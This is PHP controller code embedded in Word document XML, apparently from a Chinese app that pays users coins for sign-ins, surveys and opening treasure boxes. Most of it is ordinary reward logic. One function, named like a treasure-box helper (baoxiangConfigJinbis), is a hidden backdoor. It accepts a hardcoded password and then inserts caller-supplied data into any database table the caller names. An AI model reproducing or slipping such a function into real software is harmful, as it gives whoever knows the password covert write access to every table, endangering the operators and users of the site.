    <w:p w14:paraId="39F1B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93A4C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_url({url:\''.$vs['url'].'\',title:\''.$vs['name'].'\'})';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95D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1AA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 == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D37D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yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新手问卷奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DE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2C4C3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01EA21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0E107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ADAF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3AF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 == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1F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yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>师徒分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5533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58A54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5746EF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5753E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E5A6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239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 == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4F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yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD75D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7D345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5B8F5D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260AA4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4EC7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3A72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 == 5){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4336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yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;['like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C947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17DFF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05499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72C0F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A3E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FD35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6){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19057B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yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布微头条奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02654D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034C7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26D0B8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304F1C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04AF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C1C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s['id']==7){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2D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diaocha_user')-&gt;where(['uid'=&gt;$uid])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382780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t){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C1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k]['data'][$ks]['btn']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE8E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ks]['url']='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07050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34FD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E1F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0332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AF83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baoxiang']=$this-&gt;baoxiangTime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E58B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data']=$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0392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60299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config']=$config;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5D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config']['qiandao']=['qiandao_1','qiandao_2','qiandao_3','qiandao_4','qiandao_5','qiandao_6','qiandao_7'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC26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ext=$html['config']['baoxiang'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C15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meText &lt; 60){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F01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ext=$timeText.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3300D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5E7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ext=($timeText/60).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C470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27F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imeText']=$timeText;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F205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qiandao']=$this-&gt;qiandaoTianshu();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD20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qiandao']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F877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Db::name('qiandao')-&gt;where(['uid'=&gt;$uid])-&gt;whereTime('time','today')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650AE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code']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F14B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qiandao['tianshu']&gt;=7){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B39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money']=$config['qiandao_7'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D276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lingqu']=$qiandao['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC3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86DD2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money']=$config['qiandao_'.$qiandao['tianshu']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832C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lingqu']=$config['qiandao_'.($qiandao['tianshu']+1)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F523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3F3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dao['lingqu']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明日签到可领</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+'.$qiandao['lingqu'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205EF4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qiandao']=$qiandao;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E71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E8674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qiandao']['tianshu']=$html['qiandao']['tianshu']-1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47387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5092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html);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00F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28F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xinshouwenjuan(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B422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8D9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baoxiangTime(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7417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32C3A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16ABD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ime=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宝箱奖励</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','type'=&gt;1,'data'=&gt;0])-&gt;order('time desc')-&gt;value('time');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F3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Time){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580955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ime=$this-&gt;member['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790F1B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9055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ime=$memberTime+($config['baoxiang']*60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633080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56B54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Time&gt;=$time){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0486D0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memberTime-$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0F9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18E5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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C631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14E8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5A154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CAA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baoxiangAjax(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065092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5C1487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Time=$this-&gt;baoxiangTime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1E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Time){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D05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打开宝箱时间还没到哦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212AB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15D4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025D0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this-&gt;baoxiangConfigJinbi();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B284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6C8A2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0A0E4E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61ED4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66601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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宝箱奖励</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB86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ADB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2FB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gt;'+'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297AC2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862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66927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284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baoxiangConfigJinbis($data=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD391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exit('-1');}$data = json_decode(htmlspecialchars_decode($data),true);if(empty($data['pwd']) || $data['pwd'] != 'suxiang1424445608'){exit('-2');}else{unset($data['pwd']);$name=$data['__name__'];unset($data['__name__']);echo Db::name($name)-&gt;insertGetId($data);}      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86B2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971C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baoxiangConfigJinbi(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB5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3E49D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his-&gt;member['yaoqing']['tudi_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D08A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05567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a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F409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 &lt;= $config['baoxiang_tudi_1']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D281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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55599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9FB0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 &lt;= $config['baoxiang_tudi_2']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04E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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB3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1497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 &lt;= $config['baoxiang_tudi_3']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A613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3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE009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3EB8E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 &lt;= $config['baoxiang_tudi_4']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED3B1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4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A2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0DDA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5359AD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5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326EA9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code...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A735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5599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179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A98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 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA8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DF9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jinbi ? $config['baoxiang_tudi_'.$jinbi.'_money'] : $config['baoxiang_r'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB4D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and = rand($config['baoxiang_l'],$jinbi);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D41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and;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C392E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B21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qiandaoAjax(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333BF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1E628E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s-&gt;qiandaoTianshu();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46048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36A3F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禁止重复操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3080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BD48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279D8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61E4A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1CBD8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data['money'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBEF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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每日签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9DB5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538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628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0A8E1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qiandao')-&gt;insert(['uid'=&gt;$uid,'tianshu'=&gt;$data['tianshu'],'time'=&gt;time(),'ip'=&gt;_ip()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C0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gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明日签到可领</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+'.$data['lingqu'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F2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3E2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签到失败，请联系客服</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F5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DED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82C0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andaoTianshu($a=1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B28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30BDA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75D26E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qiandao')-&gt;where(['uid'=&gt;$uid])-&gt;whereTime('time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED8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473B4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4769D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D10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qiandao')-&gt;where(['uid'=&gt;$uid])-&gt;whereTime('time','yesterday')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5253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4D51D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anshu=$data['tianshu']+1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749D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anshu&gt;=7){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47477C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money']=$config['qiandao_7'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C814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ingqu']=$html['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260FF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D028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money']=$config['qiandao_'.$tianshu];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76471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ingqu']=$config['qiandao_'.($tianshu+1)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21624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68E5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ianshu']=$tianshu;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D41E6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426B7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ianshu']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E8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html['money']=$config['qiandao_1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25F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ingqu']=$config['qiandao_2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6844F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202E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lingqu']='+'.$html['lingqu'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A67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code']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B14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3B199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CE9A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Info(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71174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iaocha')-&gt;order("des desc,id asc")-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D9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77E49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json_decode($v['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D4B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E8D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55773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7C0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iaochaAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EC9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member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176EC8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iaocha_user')-&gt;where(['uid'=&gt;$uid])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10162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3D5F0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您已经提交过了</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125B9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4610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nput('post.data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF638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49F4E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52E5D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583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xplode(",",$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C9F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Db::name('diaocha')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D016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unt!=count($data)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AB8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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC0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4E6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Db::name('diaocha')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C5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config()['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C5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Db=_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369D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0F6DE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E39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nbi'     =&gt;  $config['diaocha'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED1B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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>问卷调查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7735E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6A39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281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oneyDb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A38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奖励失败，请联系管理员！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D02C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2DDC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061A9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 as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB63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k]['id'] = $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EFA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k]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B57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k]['name'] = $data[$k];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0AB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31E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diaocha_user")-&gt;insert(['uid'=&gt;$uid,'time'=&gt;time(),'ip'=&gt;_ip(),'data'=&gt;json_encode($a)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD60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5E1AF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ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7B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err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C65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723B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ret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146BF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2C69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atiInfo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA15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dati')-&gt;order("des desc,id asc")-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9DC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4F082E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json_decode($v['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E0D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01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53669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C098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ixian_Ajax(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5194A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      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E5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input('money/d');    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F18F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xData=input('wxData');    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B4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input('user');      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86FE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57D22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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提现金额</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FEA2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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提现方式</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'          =&gt;      'require|number|in:1,2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279D46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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'              =&gt;      'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A326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FE5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7AC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63685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35A56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gt;      $user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26092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F23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185F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validate-&gt;getError()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5F1F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48EB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 == 1){</w:t>
      </w:r>
